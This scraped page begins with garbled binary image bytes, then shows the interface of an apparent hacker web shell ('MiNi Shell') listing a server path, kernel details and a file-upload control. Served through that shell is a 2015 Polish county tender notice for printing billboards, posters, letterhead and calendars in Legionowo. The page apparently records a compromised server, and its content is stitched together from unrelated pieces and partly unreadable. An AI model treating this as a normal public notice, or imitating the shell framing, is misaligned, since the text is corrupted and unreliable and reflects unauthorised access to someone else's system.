JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150127/19280-N-2015.html

<p class="kh_header"><b>Legionowo: Usługi drukowania dla potrzeb Starostwa Powiatowego w Legionowie</b><br>
<b>Numer ogłoszenia: 19280 - 2015; data zamieszczenia: 27.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Legionowski , ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, woj. mazowieckie, tel. 22 7840872, faks 22 7742551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-legionowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi drukowania dla potrzeb Starostwa Powiatowego w Legionowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi drukowania dla potrzeb Starostwa Powiatowego w Legionowie. Przedmiot zamówienia został podzielony na trzy części, Zamawiający dopuszcza składanie ofert częściowych: 
Część 1
Druk plakatów wielkoformatowych, tzw. billboardów w pełnym kolorze i wyklejanie ich na:
- tablicach wolnostojących o wymiarach 5,04 x 2,38 m
- tablicach wolnostojących o wymiarach 4,29 x 2,48 m
- tablicach naściennych o wymiarach 5,80 x 2,70 m z użyciem podnośnika, 
zlokalizowanych na terenie powiatu legionowskiego, zlecanych sukcesywnie w ciągu roku.
Zamawiający wymaga zrealizowania usługi w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

Część 2
Druk:
1) kart okolicznościowych wraz z wkładką zgodnie z następującymi parametrami: 
format karty: 21x21 cm bigowane na pół, kolor: 4+4,
format wkładki: 10x20,5 cm, kolor: 4+0, 
papier: kreda matowa 350 g/m2, 
dostawa do siedziby Zamawiającego.
jednorazowy nakład: kartki 400 szt, wkładki 200 szt.
Łączny nakład zamówienia: kartki 800 szt, wkładki: 400 szt, zamówienie będzie składane dwa razy w ciągu roku.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

2) plakatów 
zgodnie z następującymi parametrami: 
format A3, druk 4+0, papier kreda matowa 130 g/m2 , 
dostawa do siedziby Zamawiającego, 
jednorazowy nakład: 300 szt, łączny nakład: 4.500 szt,
zamówienie będzie składane sukcesywnie w ciągu roku.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

3) ulotek
zgodnie z następującymi parametrami: 
format A5, druk 4+4, 
papier kreda matowa 170 g/m2 , 
dostawa do siedziby Zamawiającego, 
nakład: 15.000 szt.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

4) papieru firmowego
zgodnie z następującymi parametrami: 
format A4, 
papier offset 80 g/m2 , 
białość CIE 166, kolor 4+0, 
dwa wzory: pierwsza i druga strona, 
dostawa do siedziby Zamawiającego, 
nakład: 29000 szt. pierwsza strona i 1000 szt. druga strona, wzory w załączeniu, 
minimalny nakład zamówienia pierwszej strony: 5000 szt, (ostatnia partia mniejsza odpowiednio do uprzednio zamówionych partii), 
zamówienie będzie składane sukcesywnie w ciągu roku.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

5) formularzy potwierdzenia odbioru
zgodnie z następującymi parametrami: 
format 160x100 mm, 
papier offset 170 g/m2, 
kolor 4+4, formularz wyposażony w obustronne perforacje wzdłuż krótszych boków, umieszczone  w odległości ok. 1 cm od brzegu, umożliwiające oderwanie formularza od koperty, na brzegach formularza przeznaczonych do oderwania wzdłuż krótszych boków jednostronnie klej/taśma samoprzylepna zabezpieczona łatwo usuwalnymi paskami zabezpieczającymi, 
dostawa do siedziby Zamawiającego, wzór w załączeniu,
jednorazowy nakład:4000 szt., łączny nakład: 8000 szt.,
zamówienie będzie składane dwa razy w ciągu roku,
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

6) wizytówek
zgodnie z następującymi parametrami: 
druk offsetowy, 
format 85x50 mm, 
papier karton obustronnie biały 300 g/m2 , 
kolor 4+0, 
wizytówka obustronnie foliowana matowo, 
łączny nakład: 4000 szt., 
minimalny nakład zamówienia: 400 szt  (w tym jeden rodzaj zamawiany będzie w ilości minimum 100 szt.), wzór w załączeniu. 
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

Część 3
Druk i oprawa powiatowego kalendarza ściennego zgodnie z następującymi parametrami: 
format B3, 
układ pionowy, 
po krótszym boku biała metalowa spirala z białą zawieszką pośrodku, tzw. wąsy dł. ok. 10 cm, 
objętość: środek 6 kart, druk 4+4, papier kreda matowa  o gramaturze 250 g/m2, oraz 2 karty tj. okładka pierwsza (druk 4+0) i okładka ostatnia (druk 4+0), papier kreda matowa o gramaturze 250 g/m2, lakier UV błysk wybiórczy - 2 sita - na strony z kalendarium jedno i drugie na okładkę, dodatkowo plecki kartonowe białe (ok. 1/3 wysokości strony), na górnej krawędzi arkusza - przy spirali wycięcie na zawieszkę, 
pakowanie w paczki po 20 szt w szary papier pakowy, zabezpieczenie przed uszkodzeniem paczek, 
dostawa do siedziby zamawiającego.
Nakład 1100 szt.

Razem z kalendarzami wykonawca musi dostarczyć koperty (puste, poskładane i posklejane, gotowe do pakowania i wysyłki) o wielkości po złożeniu dostosowanej do B3 (bez konieczności składania czy zaginania kalendarza), umożliwiające bezpieczne zapakowanie 3-5 kalendarzy, bez zadruku, z mocną taśmą klejącą na zamknięciu (po zamknięciu nie może się rozklejać) białe lub jasno kremowe, kartonowe (np. z mikrofali), dostawa gotowych kopert do siedziby zamawiającego, pakowane w paczki po 20 szt. 
Nakład 300 szt.
Zamawiający wymaga dostawy w terminie maksymalnie 14 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

2. Dostawa przedmiotu zamówienia odbywać się będzie na koszt i ryzyko Wykonawcy.  
3. Jeżeli w SIWZ, ogłoszeniach związanych z postępowaniem w szczegółowym opisie przedmiotu zamówienia opisano przedmiot zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, to ma to na celu jedynie określenie cech technicznych, czy właściwości określonego sprzętu, urządzeń, materiałów i oprogramowania jakie należy zastosować dla wykonania przedmiotu zamówienia. Zamawiający dopuszcza zastosowanie w takich przypadkach sprzętu, urządzeń, materiałów i oprogramowań równoważnych zgodnie z art. 29 ust. 3 ustawy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 ustawy Pzp, polegających na powtórzeniu tego samego rodzaju zamówień, co zamówienie podstawowe, tj. zamówienia na usługi drukowania i dostawy o wartości do 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena odbędzie się na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają wiedzę i doświadczenie, zapewniające należyte wykonanie zamówienia, tj. w ciągu ostatnich trzech lat wykonali co najmniej jedno zamówienie polegające na:
dla części nr 1: druku i wyklejeniu plakatów wielkoformatowych, tzw. bilbordów w pełnym kolorze o wartości minimum 12.000 zł,
dla części nr 2: druku i dostawie kart okolicznościowych, ulotek, plakatów, papieru firmowego, formularzy potwierdzenia odbioru lub wizytówek o łącznej wartości min. 16.000 zł;
dla części nr 3: druku i dostawie kalendarzy wielkoplanszowych o łącznej wartości min. 8.000 zł,
 i przedstawią dowody potwierdzające należyte wykonanie przywołanych zamówień.

Ocena spełnienia tego warunku odbędzie się na podstawie złożonego wykazu zrealizowanych zamówień z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie, zgodnie z formułą spełnia - nie spełnia. 
Dowodami o których mowa powyżej potwierdzającymi czy usługi zostały wykonane lub są wykonywane należycie są:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Jeśli wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie usług zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów potwierdzających czy usługi te zostały wykonane należycie. 
W przypadku usług wykonywanych (t.j. rozpoczętych, a nie zakończonych) na poczet wymaganej wiedzy i doświadczenia będzie zaliczona wyłącznie jej zrealizowana część. Tylko ta część może być przez Wykonawcę wykazywana na poczet wymaganej, dla celów wykazania spełniania warunku posiadania wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena odbędzie się na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena odbędzie się na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, ocena odbędzie się na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy ofertę podpisują osoby, których upoważnienie do reprezentacji nie wynika z dokumentów rejestrowych załączonych do oferty, wymaga się, aby Wykonawca dołączył do oferty oryginał pełnomocnictwa do podpisania oferty lub kserokopię poświadczoną notarialnie za zgodność z oryginałem. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących w szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w przypadku: 
1) siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z ofertą i SIWZ,
2) zmian wynikających z przepisów prawa, 
3) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy, w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za prawidłowo zrealizowaną dostawę,
4) w razie zmiany wysokości stawki VAT Strony dokonują zmiany uwzględniającej nową wysokość tej stawki,
4. Siła wyższa oznacza każde zdarzenie uniemożliwiające wykonanie zobowiązania, pozostające poza kontrolą stron, którego strony nie mogły przewidzieć w chwili zawierania niniejszej umowy i któremu nie można było zapobiec, w tym między innymi działanie sił przyrody, stan wyjątkowy, stan wojenny, nowe ustawodawstwo lub decyzje administracyjne, awarie techniczne mające wpływ na wykonanie niniejszej umowy, i/lub wszelkie inne zdarzenia podobnej natury, jeżeli zaistnienie takich zdarzeń uniemożliwi którejkolwiek ze stron należyte wykonanie niniejszej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat-legionowski.pl zakładka Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w wersji papierowej w cenie 20,00 zł można uzyskać: ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, Zespół ds. Zamówień Publicznych, V piętro, pokój 516, 22/7640598, 7840872.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2015 godzina 10:00, miejsce: Kancelaria na parterze przy wejściu głównym Starostwa Powiatowego w Legionowie, ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk plakatów wielkoformatowych, tzw. billboardów w pełnym kolorze i wyklejanie ich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk plakatów wielkoformatowych, tzw. billboardów w pełnym kolorze i wyklejanie ich na:
- tablicach wolnostojących o wymiarach 5,04 x 2,38 m
- tablicach wolnostojących o wymiarach 4,29 x 2,48 m
- tablicach naściennych o wymiarach 5,80 x 2,70 m z użyciem podnośnika, 
zlokalizowanych na terenie powiatu legionowskiego, zlecanych sukcesywnie w ciągu roku.
Zamawiający wymaga zrealizowania usługi w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.
Krótszy czas realizacji jest dodatkowo punktowany, zgodnie z rozdziałem XV Kryteria oceny ofert i wybór oferty najkorzystniejszej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk kart okolicznościowych wraz z wkładką, plakatów, ulotek, papieru firmowego, formularzy potwierdzenia odbioru oraz wizytówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk:
1) kart okolicznościowych wraz z wkładką zgodnie z następującymi parametrami: 
format karty: 21x21 cm bigowane na pół, kolor: 4+4,
format wkładki: 10x20,5 cm, kolor: 4+0, 
papier: kreda matowa 350 g/m2, 
dostawa do siedziby Zamawiającego.
jednorazowy nakład: kartki 400 szt, wkładki 200 szt.
Łączny nakład zamówienia: kartki 800 szt, wkładki: 400 szt, zamówienie będzie składane dwa razy w ciągu roku.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

2) plakatów 
zgodnie z następującymi parametrami: 
format A3, druk 4+0, papier kreda matowa 130 g/m2 , 
dostawa do siedziby Zamawiającego, 
jednorazowy nakład: 300 szt, łączny nakład: 4.500 szt,
zamówienie będzie składane sukcesywnie w ciągu roku.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

3) ulotek
zgodnie z następującymi parametrami: 
format A5, druk 4+4, 
papier kreda matowa 170 g/m2 , 
dostawa do siedziby Zamawiającego, 
nakład: 15.000 szt.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

4) papieru firmowego
zgodnie z następującymi parametrami: 
format A4, 
papier offset 80 g/m2 , 
białość CIE 166, kolor 4+0, 
dwa wzory: pierwsza i druga strona, 
dostawa do siedziby Zamawiającego, 
nakład: 29000 szt. pierwsza strona i 1000 szt. druga strona, wzory w załączeniu, 
minimalny nakład zamówienia pierwszej strony: 5000 szt, (ostatnia partia mniejsza odpowiednio do uprzednio zamówionych partii), 
zamówienie będzie składane sukcesywnie w ciągu roku.
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

5) formularzy potwierdzenia odbioru
zgodnie z następującymi parametrami: 
format 160x100 mm, 
papier offset 170 g/m2, 
kolor 4+4, formularz wyposażony w obustronne perforacje wzdłuż krótszych boków, umieszczone  w odległości ok. 1 cm od brzegu, umożliwiające oderwanie formularza od koperty, na brzegach formularza przeznaczonych do oderwania wzdłuż krótszych boków jednostronnie klej/taśma samoprzylepna zabezpieczona łatwo usuwalnymi paskami zabezpieczającymi, 
dostawa do siedziby Zamawiającego, wzór w załączeniu,
jednorazowy nakład:4000 szt., łączny nakład: 8000 szt.,
zamówienie będzie składane dwa razy w ciągu roku,
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

6) wizytówek
zgodnie z następującymi parametrami: 
druk offsetowy, 
format 85x50 mm, 
papier karton obustronnie biały 300 g/m2 , 
kolor 4+0, 
wizytówka obustronnie foliowana matowo, 
łączny nakład: 4000 szt., 
minimalny nakład zamówienia: 400 szt  (w tym jeden rodzaj zamawiany będzie w ilości minimum 100 szt.), wzór w załączeniu. 
Zamawiający wymaga dostawy w terminie maksymalnie 4 dni roboczych od dnia przesłania materiałów do druku na serwer Wykonawcy.

Część 3
